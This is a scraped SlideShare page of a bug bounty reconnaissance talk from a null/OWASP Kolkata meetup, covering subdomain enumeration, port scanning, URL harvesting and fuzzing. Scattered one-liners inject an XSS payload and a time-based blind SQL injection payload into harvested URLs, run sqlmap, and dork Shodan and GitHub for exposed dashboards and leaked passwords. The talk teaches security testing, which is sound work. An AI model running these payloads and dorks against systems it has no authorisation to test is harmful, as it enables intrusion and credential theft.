SlideShare a Scribd company logo

Recon for Bug Bounty by Agnibha Dutta.pdf

null - The Open Security Community
null - The Open Security Community

Talk on "Recon Resurgence: Level up your Recon skills for Maximum impact in Bug-Bounty" by "Agnibha Dutta" at null/OWASP Kolkata Meetup on 27 January 2024

Technology
1 of 25
Download to read offline
Recon Resurgence: Level up your Recon skills for Maximum impact in Bug-Bounty
WHOAMI? Security Analyst at Mithra Consulting Pursuing MBBS Part-time Bug bounty hunter CyberSecurity Trainer & Mentor Agnibha Dutta Y0gi eJPT Certified Successfully Hacked and Secured: Sony Acronis NASA + 20 other companies https://twitter.com/AnonY0gi https://www.youtube.com/@y0gisec https://www.linkedin.com/in/y0gi/
WHAT IS RECONNAISSANCE? The Reconnaissance is one of the most important aspect of penetration testing. Its also known as Recon. Recon will help you to increase attack surface area and may allow you to get more vulnerabilities but ultimate goal is to dig deep in the target Recon = Increase in Attack surface = More vulnerabilities Recon = Finding untouched endpoints = Less duplicates Recon = Sharpening your axe before attack
SUBDOMAIN ENUMERATION Subdomain enumeration is the process of finding subdomains for one or more domain. Tools used: Visual Recon: VirusTotal, subdomainfinder.c99.nl https://crt.sh/?q=%25.target.com https://securitytrails.com/list/apex_domain/target.com https://www.shodan.io/search?query=Ssl.cert.subject.CN%3A%22t arget.com%22 Amass Dnsx Subfinder Chaos AssetFinder
SUBDOMAIN ENUMERATION amass enum -passive -norecursive -noalts -df domians.txt -o subs-list.txt dnsx -silent -d $domain -w ~/wordlist.txt -o ~/dnsbrute.txt cat domain.txt | dnsgen - | massdns -r ~/resolvers.txt -o S -w alive.txt
FILTERING THE SUBDOMAINS WITH HTTPX httpx -l domain.txt -timeout 13 -o domain-probe.txt PORT SCANNING naabu -list sub-list.txt -top-ports 1000 -exclude-ports 80,443,21,22,25 -o ports.txt naabu -list sub-list.txt -p - -exclude-ports 80,443,21,22,25 -o ports.txt cat domain-subs.txt | aquatone -ports xlarge -scan-timeout 300 -out aquatone.txt HEDnsExtractor -target 20.216.181.67 -only-domains -silent | httpx -title -tech-detect - status-code -silent
SUBDOMAIN OF SUBDOMAIN ENUMERATION One of the rare things people search of. Tools used: Subbrute: https://github.com/TheRook/subbrute altdns: https://github.com/infosec-au/altdns Usage: ./altdns.py -i subdomains.txt -o data_output -w words.txt -r -s output.txt
FINDING LOGIN PANEL FROM URLS Extract login panel from a list of urls for further testing . Tools used: https://github.com/Mr-Robert0/Logsensor
BROADENING YOUR SCOPE More targets lead to more option which ultimately lead to more opportunities. Crunchbase bgp.he.net tools.whoisxmlapi.com https://whois.arin.net
WHAT TO DO AFTER ENUMERATION? | Collecting URLs Waybackurls: https://github.com/tomnomnom/waybackurls Gau: https://github.com/lc/gau for i in $(cat domain-subs.txt);do gau $i | egrep -vE ".(woff | woff2 | ttf | toff | eot | webp | gif | tiff | bmp | wav | png | jpg | jpeg | svg | ico | css | mp4 | m4v)" | httpx -silent -fc 404 | tee -a domain-archive.txt;done https://web.archive.org/cdx/search/cdx?url=*.target.com&fl=original&collapse= urlkey
After collecting URLs, curl out the responses of the URLs and grep for the following URLs: drive.google docs.google /spreadsheets/d/ /document/d/ TIPS AND TRICKS By Aditya_Shende cat domains.txt | katana -silent | while read url; do cu=$(curl -s $url | grep -E '(drive. google | docs. google | spreadsheet/d | document./d/)';echo -e "==> $url" "n"" $cu"; done
TIPS AND TRICKS Alien Vault OTX (otx.alienvault.com) Collect Endpoints : https://github.com/xnl-h4ck3r/waymore Common Crawl (index.commoncrawl.org) URLScan (urlscan.io)
Using paramspider, gxss to detect Cross-site Scripting (XSS) cat params | qsreplace yogi | dalfox pipe --mining-dom --deep-domxss --mining-dict --remote- payloads=portswigger,payloadbox --remote-wordlists=burp,assetnote -o xssoutput.txt cat alive.txt | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | tee xssBug3.txt TIPS AND TRICKS Using SQLidetector to search for sqli Tool Link: https://github.com/eslam3kl/SQLiDetector
https://github.com/xforcered/SQLRecon TIPS AND TRICKS SQLi Time Based Tips cat urls.txt | grep "=" | qsreplace "1 AND (SELECT 5230 FROM (SELECT(SLEEP(10)))SUmc)" > blindsqli.txt cat blindsqli.txt | parallel -j50 -q curl -o /dev/null -s -w % {time_total}n Header Based SqLi: https://github.com/SAPT01/HBSQLI subfinder -dL domains.txt | dnsx | waybackurl | uro | grep "?" | head -20 | httpx -silent > urls;sqlmap -m urls --batch --random-agent --level 1 | tee sqlmap.txt
Shodan: https://www.shodan.io/ SHODAN FOR RECON Shodan Dork: ssl:"target[.]com" 200 http.title:"dashboard" --unauthenticated dashboard org:"target.com" x-jenkins 200 --- unauthenticated jenkins server ssl:"target.com" 200 proftpd port:21 --- proftpd port:21 org:"target.com" http.html:zabbix --- CVE-2022-24255 Main & Admin Portals: Authentication Bypass org:"target.com" http.title:"phpmyadmin" ----php my admin ssl:"target.com" http.title:"BIG-IP ---F5 BIG-IP using CVE-2020-5902 Use Shodan in combination with Fofa & use exploit .
Censys: https://www.censys.io/ CENSYS, ZOOMEYE Zoomeye: https://www.zoomeye.org/ Tip: http.favicon.hash:xxxxxxxxxx
ffuf: https://github.com/ffuf/ffuf FUZZING FOR SENSITIVE FILES & DIRECTORIES FFUF-ing RECON Writeup on FFuf for i in `cat host.txt`; do ffuf -u $i/FUZZ -w wordlist.txt -mc 200,302,401 -se ;done Tip: Fuzz for "/wp-content/debug.log" || Sometimes they contain SQL error, which can be chained.
/.git/config /docker-compose.yml /wp-admin/admin-ajax.php?action=<text>wp-json/wp/v2/users/ /wp-content/plugins/contact-form-7/readme.txt /https://:80?@evil /common/config.php.new ADD THESE IN YOUR FUZZING LIST
y0gi.hacklido.com y0gi.hacklido.com /y0gi.zip - hacklido.zip – admin.zip – backup.zip y0gi.hacklido.com/y0gi/y0gi.zip - hacklido.zip – admin.zip – backup.zip y0gi. hacklido.com/hacklido/y0gi.zip - hacklido.zip – admin.zip – backup.zip y0gi. hacklido.com/admin/y0gi.zip - hacklido.zip – admin.zip – backup.zip FINDING SOURCE/BACKUP FILES Tool: https://github.com/musana/fuzzuli Credit: GodfatherOrwa
Trivial Tricks: Find Sensitive Data in Cloud storage: site:http://s3.amazonaws.com "target[.]com" site:http://blob.core.windows.net "target[.]com" site:http://googleapis.com "target[.]com" site:http://drive.google.com "target[.]com" Github Leaks for AWS, Jira, Okta, etc: Org:"target" pwd/pass/passwd/password "target.atlassian" pwd/pass/passwd/password "target.okta" pwd/pass/passwd/password "Jira.target" pwd/pass/passwd/password Also search in Google groups, Gitlabs. GOOGLE & GITHUB DORKING
Grep all urls from wayback or gau. Collect all js file ".js" Filter js file: " httpx -content-type | grep 'application/javascript'" Perform Nuclei scan "nuclei -t /root/nuclei-templates/exposures/" JAVASCRIPT[JS] FILES RECON Js Recon Tip: Collect all endpoints from Js files & Create a wordlist from those. Craft a POST request with any parameter. Use that request to fuzz for sensitive directory. Tools: JSFSCAN , Jsminer {Burp Extension} , Trufflehog
JAVASCRIPT[JS] FILES RECON Using Bambdas for js analysis: One Liner : echo targetdomain[.]com | gau | grep ".js" | httpx -content-type | grep 'application/javascript'" | awk '{print $1}' | nuclei -t /root/nuclei- templates/exposures/ -silent > secrets.txt
Verify Data Some data are intended, No bug here. Reported > Invalid Don't get angry, You may lose bonds with good program Yes, They do accept Third Party Your crafting and exploits are gold. Make it high as you can Be humble with Program Money going no where. Don't message constant to team
QNA SESSION https://twitter.com/AnonY0gi https://www.youtube.com/@y0gisec https://www.linkedin.com/in/y0gi/
THANK YOU

Recommended

The-Power-Of-Recon (1)-poerfulo.pptx.pdf
The-Power-Of-Recon (1)-poerfulo.pptx.pdfThe-Power-Of-Recon (1)-poerfulo.pptx.pdf
The-Power-Of-Recon (1)-poerfulo.pptx.pdfnezidsilva
 
Hacking and Defending APIs - Red and Blue make Purple.pdf
Hacking and Defending APIs - Red and Blue make Purple.pdfHacking and Defending APIs - Red and Blue make Purple.pdf
Hacking and Defending APIs - Red and Blue make Purple.pdfMatt Tesauro
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
Pentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarPentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarOWASP Delhi
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101Shahee Mirza
 
Bug bounty recon.pdf
Bug bounty recon.pdfBug bounty recon.pdf
Bug bounty recon.pdfEusebiuDanielBlindu
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
OWASP API Security Top 10 Examples
OWASP API Security Top 10 ExamplesOWASP API Security Top 10 Examples
OWASP API Security Top 10 Examples42Crunch
 

Recommended

The-Power-Of-Recon (1)-poerfulo.pptx.pdf
The-Power-Of-Recon (1)-poerfulo.pptx.pdfThe-Power-Of-Recon (1)-poerfulo.pptx.pdf
The-Power-Of-Recon (1)-poerfulo.pptx.pdfnezidsilva
 
Hacking and Defending APIs - Red and Blue make Purple.pdf
Hacking and Defending APIs - Red and Blue make Purple.pdfHacking and Defending APIs - Red and Blue make Purple.pdf
Hacking and Defending APIs - Red and Blue make Purple.pdfMatt Tesauro
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
Pentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarPentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarOWASP Delhi
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101Shahee Mirza
 
Bug bounty recon.pdf
Bug bounty recon.pdfBug bounty recon.pdf
Bug bounty recon.pdfEusebiuDanielBlindu
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
OWASP API Security Top 10 Examples
OWASP API Security Top 10 ExamplesOWASP API Security Top 10 Examples
OWASP API Security Top 10 Examples42Crunch
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
ABCD of Bugbounty.pptx
ABCD of Bugbounty.pptxABCD of Bugbounty.pptx
ABCD of Bugbounty.pptxMd Atikqur Rahman
 
Bug bounty
Bug bountyBug bounty
Bug bountyn|u - The Open Security Community
 
Bug Bounty - Play For Money
Bug Bounty - Play For MoneyBug Bounty - Play For Money
Bug Bounty - Play For MoneyShubham Gupta
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked LookJason Lang
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Shubham Gupta
 
Api security-testing
Api security-testingApi security-testing
Api security-testingn|u - The Open Security Community
 
Getting Started with API Security Testing
Getting Started with API Security TestingGetting Started with API Security Testing
Getting Started with API Security TestingSmartBear
 
Practical Application of the API Security Top Ten: A Tester's Perspective
Practical Application of the API Security Top Ten: A Tester's PerspectivePractical Application of the API Security Top Ten: A Tester's Perspective
Practical Application of the API Security Top Ten: A Tester's PerspectiveRajniHatti
 
Android Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamAndroid Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamMohammed Adam
 
Pentesting ReST API
Pentesting ReST APIPentesting ReST API
Pentesting ReST APINutan Kumar Panda
 
Different Methodology To Recon Your Targets
Different Methodology To Recon Your TargetsDifferent Methodology To Recon Your Targets
Different Methodology To Recon Your TargetsEslamAkl
 
Pentesting Using Burp Suite
Pentesting Using Burp SuitePentesting Using Burp Suite
Pentesting Using Burp Suitejasonhaddix
 
Bug Bounty - Hackers Job
Bug Bounty - Hackers JobBug Bounty - Hackers Job
Bug Bounty - Hackers JobArbin Godar
 
Hackfest presentation.pptx
Hackfest presentation.pptxHackfest presentation.pptx
Hackfest presentation.pptxPeter Yaworski
 
F5 BIG-IP Misconfigurations
F5 BIG-IP MisconfigurationsF5 BIG-IP Misconfigurations
F5 BIG-IP MisconfigurationsDenis Kolegov
 
Burp Suite Starter
Burp Suite StarterBurp Suite Starter
Burp Suite StarterFadi Abdulwahab
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Sagar M Parmar
 
Security Testing Training With Examples
Security Testing Training With ExamplesSecurity Testing Training With Examples
Security Testing Training With ExamplesAlwin Thayyil
 
OSINT x UCCU Workshop on Open Source Intelligence
OSINT x UCCU Workshop on Open Source IntelligenceOSINT x UCCU Workshop on Open Source Intelligence
OSINT x UCCU Workshop on Open Source IntelligencePhilippe Lin
 
Adopt DevOps philosophy on your Symfony projects (Symfony Live 2011)
Adopt DevOps philosophy on your Symfony projects (Symfony Live 2011)Adopt DevOps philosophy on your Symfony projects (Symfony Live 2011)
Adopt DevOps philosophy on your Symfony projects (Symfony Live 2011)Fabrice Bernhard
 
TIAD - DYI: A simple orchestrator built step by step
TIAD - DYI: A simple orchestrator built step by stepTIAD - DYI: A simple orchestrator built step by step
TIAD - DYI: A simple orchestrator built step by stepThe Incredible Automation Day
 

More Related Content

What's hot

The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Bug Bounty - Play For Money
Bug Bounty - Play For MoneyBug Bounty - Play For Money
Bug Bounty - Play For MoneyShubham Gupta
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked LookJason Lang
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Shubham Gupta
 
Getting Started with API Security Testing
Getting Started with API Security TestingGetting Started with API Security Testing
Getting Started with API Security TestingSmartBear
 
Practical Application of the API Security Top Ten: A Tester's Perspective
Practical Application of the API Security Top Ten: A Tester's PerspectivePractical Application of the API Security Top Ten: A Tester's Perspective
Practical Application of the API Security Top Ten: A Tester's PerspectiveRajniHatti
 
Android Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamAndroid Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamMohammed Adam
 
Different Methodology To Recon Your Targets
Different Methodology To Recon Your TargetsDifferent Methodology To Recon Your Targets
Different Methodology To Recon Your TargetsEslamAkl
 
Pentesting Using Burp Suite
Pentesting Using Burp SuitePentesting Using Burp Suite
Pentesting Using Burp Suitejasonhaddix
 
Bug Bounty - Hackers Job
Bug Bounty - Hackers JobBug Bounty - Hackers Job
Bug Bounty - Hackers JobArbin Godar
 
Hackfest presentation.pptx
Hackfest presentation.pptxHackfest presentation.pptx
Hackfest presentation.pptxPeter Yaworski
 
F5 BIG-IP Misconfigurations
F5 BIG-IP MisconfigurationsF5 BIG-IP Misconfigurations
F5 BIG-IP MisconfigurationsDenis Kolegov
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Sagar M Parmar
 
Security Testing Training With Examples
Security Testing Training With ExamplesSecurity Testing Training With Examples
Security Testing Training With ExamplesAlwin Thayyil
 
OSINT x UCCU Workshop on Open Source Intelligence
OSINT x UCCU Workshop on Open Source IntelligenceOSINT x UCCU Workshop on Open Source Intelligence
OSINT x UCCU Workshop on Open Source IntelligencePhilippe Lin
 

What's hot (20)

The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
ABCD of Bugbounty.pptx
ABCD of Bugbounty.pptxABCD of Bugbounty.pptx
ABCD of Bugbounty.pptx
 
Bug bounty
Bug bountyBug bounty
Bug bounty
 
Bug Bounty - Play For Money
Bug Bounty - Play For MoneyBug Bounty - Play For Money
Bug Bounty - Play For Money
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked Look
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Getting Started with API Security Testing
Getting Started with API Security TestingGetting Started with API Security Testing
Getting Started with API Security Testing
 
Practical Application of the API Security Top Ten: A Tester's Perspective
Practical Application of the API Security Top Ten: A Tester's PerspectivePractical Application of the API Security Top Ten: A Tester's Perspective
Practical Application of the API Security Top Ten: A Tester's Perspective
 
Android Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamAndroid Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed Adam
 
Pentesting ReST API
Pentesting ReST APIPentesting ReST API
Pentesting ReST API
 
Different Methodology To Recon Your Targets
Different Methodology To Recon Your TargetsDifferent Methodology To Recon Your Targets
Different Methodology To Recon Your Targets
 
Pentesting Using Burp Suite
Pentesting Using Burp SuitePentesting Using Burp Suite
Pentesting Using Burp Suite
 
Bug Bounty - Hackers Job
Bug Bounty - Hackers JobBug Bounty - Hackers Job
Bug Bounty - Hackers Job
 
Hackfest presentation.pptx
Hackfest presentation.pptxHackfest presentation.pptx
Hackfest presentation.pptx
 
F5 BIG-IP Misconfigurations
F5 BIG-IP MisconfigurationsF5 BIG-IP Misconfigurations
F5 BIG-IP Misconfigurations
 
Burp Suite Starter
Burp Suite StarterBurp Suite Starter
Burp Suite Starter
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17
 
Security Testing Training With Examples
Security Testing Training With ExamplesSecurity Testing Training With Examples
Security Testing Training With Examples
 
OSINT x UCCU Workshop on Open Source Intelligence
OSINT x UCCU Workshop on Open Source IntelligenceOSINT x UCCU Workshop on Open Source Intelligence
OSINT x UCCU Workshop on Open Source Intelligence
 

Similar to Recon for Bug Bounty by Agnibha Dutta.pdf

Adopt DevOps philosophy on your Symfony projects (Symfony Live 2011)
Adopt DevOps philosophy on your Symfony projects (Symfony Live 2011)Adopt DevOps philosophy on your Symfony projects (Symfony Live 2011)
Adopt DevOps philosophy on your Symfony projects (Symfony Live 2011)Fabrice Bernhard
 
TIAD - DYI: A simple orchestrator built step by step
TIAD - DYI: A simple orchestrator built step by stepTIAD - DYI: A simple orchestrator built step by step
TIAD - DYI: A simple orchestrator built step by stepThe Incredible Automation Day
 
Behavior & Specification Driven Development in PHP - #OpenWest
Behavior & Specification Driven Development in PHP - #OpenWestBehavior & Specification Driven Development in PHP - #OpenWest
Behavior & Specification Driven Development in PHP - #OpenWestJoshua Warren
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slidesDocker, Inc.
 
From Code to Cloud - PHP on Red Hat's OpenShift
From Code to Cloud - PHP on Red Hat's OpenShiftFrom Code to Cloud - PHP on Red Hat's OpenShift
From Code to Cloud - PHP on Red Hat's OpenShiftEric D. Schabell
 
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiGrâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiJérémy Derussé
 
Porting Rails Apps to High Availability Systems
Porting Rails Apps to High Availability SystemsPorting Rails Apps to High Availability Systems
Porting Rails Apps to High Availability SystemsMarcelo Pinheiro
 
Simplify your professional web development with symfony
Simplify your professional web development with symfonySimplify your professional web development with symfony
Simplify your professional web development with symfonyFrancois Zaninotto
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon praguehernanibf
 
Bar Camp Ubiquity Presentation
Bar Camp Ubiquity PresentationBar Camp Ubiquity Presentation
Bar Camp Ubiquity PresentationAndy Edmonds
 
Bar Camp Talk on Ubiquity
Bar Camp Talk on UbiquityBar Camp Talk on Ubiquity
Bar Camp Talk on Ubiquityguest5014a
 
Introduction to PowerShell
Introduction to PowerShellIntroduction to PowerShell
Introduction to PowerShellBoulos Dib
 
Building with Firebase
Building with FirebaseBuilding with Firebase
Building with FirebaseMike Fowler
 
Operating Docker
Operating DockerOperating Docker
Operating DockerJen Andre
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationAnant Shrivastava
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application HackingRaghav Bisht
 
Comment améliorer le quotidien des Développeurs PHP ?
Comment améliorer le quotidien des Développeurs PHP ?Comment améliorer le quotidien des Développeurs PHP ?
Comment améliorer le quotidien des Développeurs PHP ?AFUP_Limoges
 
Drone CI/CD Platform
Drone CI/CD PlatformDrone CI/CD Platform
Drone CI/CD PlatformBo-Yi Wu
 

Similar to Recon for Bug Bounty by Agnibha Dutta.pdf (20)

Adopt DevOps philosophy on your Symfony projects (Symfony Live 2011)
Adopt DevOps philosophy on your Symfony projects (Symfony Live 2011)Adopt DevOps philosophy on your Symfony projects (Symfony Live 2011)
Adopt DevOps philosophy on your Symfony projects (Symfony Live 2011)
 
TIAD - DYI: A simple orchestrator built step by step
TIAD - DYI: A simple orchestrator built step by stepTIAD - DYI: A simple orchestrator built step by step
TIAD - DYI: A simple orchestrator built step by step
 
Behavior & Specification Driven Development in PHP - #OpenWest
Behavior & Specification Driven Development in PHP - #OpenWestBehavior & Specification Driven Development in PHP - #OpenWest
Behavior & Specification Driven Development in PHP - #OpenWest
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack Fu
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slides
 
From Code to Cloud - PHP on Red Hat's OpenShift
From Code to Cloud - PHP on Red Hat's OpenShiftFrom Code to Cloud - PHP on Red Hat's OpenShift
From Code to Cloud - PHP on Red Hat's OpenShift
 
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiGrâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
 
Porting Rails Apps to High Availability Systems
Porting Rails Apps to High Availability SystemsPorting Rails Apps to High Availability Systems
Porting Rails Apps to High Availability Systems
 
Simplify your professional web development with symfony
Simplify your professional web development with symfonySimplify your professional web development with symfony
Simplify your professional web development with symfony
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon prague
 
Bar Camp Ubiquity Presentation
Bar Camp Ubiquity PresentationBar Camp Ubiquity Presentation
Bar Camp Ubiquity Presentation
 
Bar Camp Talk on Ubiquity
Bar Camp Talk on UbiquityBar Camp Talk on Ubiquity
Bar Camp Talk on Ubiquity
 
Introduction to PowerShell
Introduction to PowerShellIntroduction to PowerShell
Introduction to PowerShell
 
Building with Firebase
Building with FirebaseBuilding with Firebase
Building with Firebase
 
Operating Docker
Operating DockerOperating Docker
Operating Docker
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web Application
 
PHP selber bauen
PHP selber bauenPHP selber bauen
PHP selber bauen
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application Hacking
 
Comment améliorer le quotidien des Développeurs PHP ?
Comment améliorer le quotidien des Développeurs PHP ?Comment améliorer le quotidien des Développeurs PHP ?
Comment améliorer le quotidien des Développeurs PHP ?
 
Drone CI/CD Platform
Drone CI/CD PlatformDrone CI/CD Platform
Drone CI/CD Platform
 

More from null - The Open Security Community

Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxnull - The Open Security Community
 
Immutable Desktop using Container Orchestration By Mohammed Danish Amber .pdf
Immutable Desktop using Container Orchestration By Mohammed Danish Amber .pdfImmutable Desktop using Container Orchestration By Mohammed Danish Amber .pdf
Immutable Desktop using Container Orchestration By Mohammed Danish Amber .pdfnull - The Open Security Community
 
Digital Personal Data Protection Act 2023 by S Ramakrishnan.pdf
Digital Personal Data Protection Act 2023 by S Ramakrishnan.pdfDigital Personal Data Protection Act 2023 by S Ramakrishnan.pdf
Digital Personal Data Protection Act 2023 by S Ramakrishnan.pdfnull - The Open Security Community
 
Beyond Boundaries-The Power of Zero Trust Networking By Mohammed Danish Amber...
Beyond Boundaries-The Power of Zero Trust Networking By Mohammed Danish Amber...Beyond Boundaries-The Power of Zero Trust Networking By Mohammed Danish Amber...
Beyond Boundaries-The Power of Zero Trust Networking By Mohammed Danish Amber...null - The Open Security Community
 
Reverse Engineering and It’s Basic by Prasenjit Kanti Paul.pptx
Reverse Engineering and It’s Basic by Prasenjit Kanti Paul.pptxReverse Engineering and It’s Basic by Prasenjit Kanti Paul.pptx
Reverse Engineering and It’s Basic by Prasenjit Kanti Paul.pptxnull - The Open Security Community
 
Get Started with Cyber Security and Its Landscape Null Community Presentation...
Get Started with Cyber Security and Its Landscape Null Community Presentation...Get Started with Cyber Security and Its Landscape Null Community Presentation...
Get Started with Cyber Security and Its Landscape Null Community Presentation...null - The Open Security Community
 
Demystifying Cyber Threat Intelligence -Debraj Dey Null_OWASP kolkata .pptx
Demystifying Cyber Threat Intelligence -Debraj Dey Null_OWASP kolkata .pptxDemystifying Cyber Threat Intelligence -Debraj Dey Null_OWASP kolkata .pptx
Demystifying Cyber Threat Intelligence -Debraj Dey Null_OWASP kolkata .pptxnull - The Open Security Community
 

More from null - The Open Security Community (18)

Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Exploring_Network_Security_with_JA3_by_Rakesh Seal.pptx
Exploring_Network_Security_with_JA3_by_Rakesh Seal.pptxExploring_Network_Security_with_JA3_by_Rakesh Seal.pptx
Exploring_Network_Security_with_JA3_by_Rakesh Seal.pptx
 
Hardware-Hacking-101 By Asutosh Kumar.pdf
Hardware-Hacking-101 By Asutosh Kumar.pdfHardware-Hacking-101 By Asutosh Kumar.pdf
Hardware-Hacking-101 By Asutosh Kumar.pdf
 
Demystifying-DNS-Attack-by-Rakesh Seal.pdf
Demystifying-DNS-Attack-by-Rakesh Seal.pdfDemystifying-DNS-Attack-by-Rakesh Seal.pdf
Demystifying-DNS-Attack-by-Rakesh Seal.pdf
 
Immutable Desktop using Container Orchestration By Mohammed Danish Amber .pdf
Immutable Desktop using Container Orchestration By Mohammed Danish Amber .pdfImmutable Desktop using Container Orchestration By Mohammed Danish Amber .pdf
Immutable Desktop using Container Orchestration By Mohammed Danish Amber .pdf
 
A talk on OWASP Top 10 by Mukunda Tamly
A talk on OWASP Top 10 by Mukunda TamlyA talk on OWASP Top 10 by Mukunda Tamly
A talk on OWASP Top 10 by Mukunda Tamly
 
The Mysterious Paradigm of Fuzzing by Rakesh Seal
The Mysterious Paradigm of Fuzzing by Rakesh SealThe Mysterious Paradigm of Fuzzing by Rakesh Seal
The Mysterious Paradigm of Fuzzing by Rakesh Seal
 
Digital Personal Data Protection Act 2023 by S Ramakrishnan.pdf
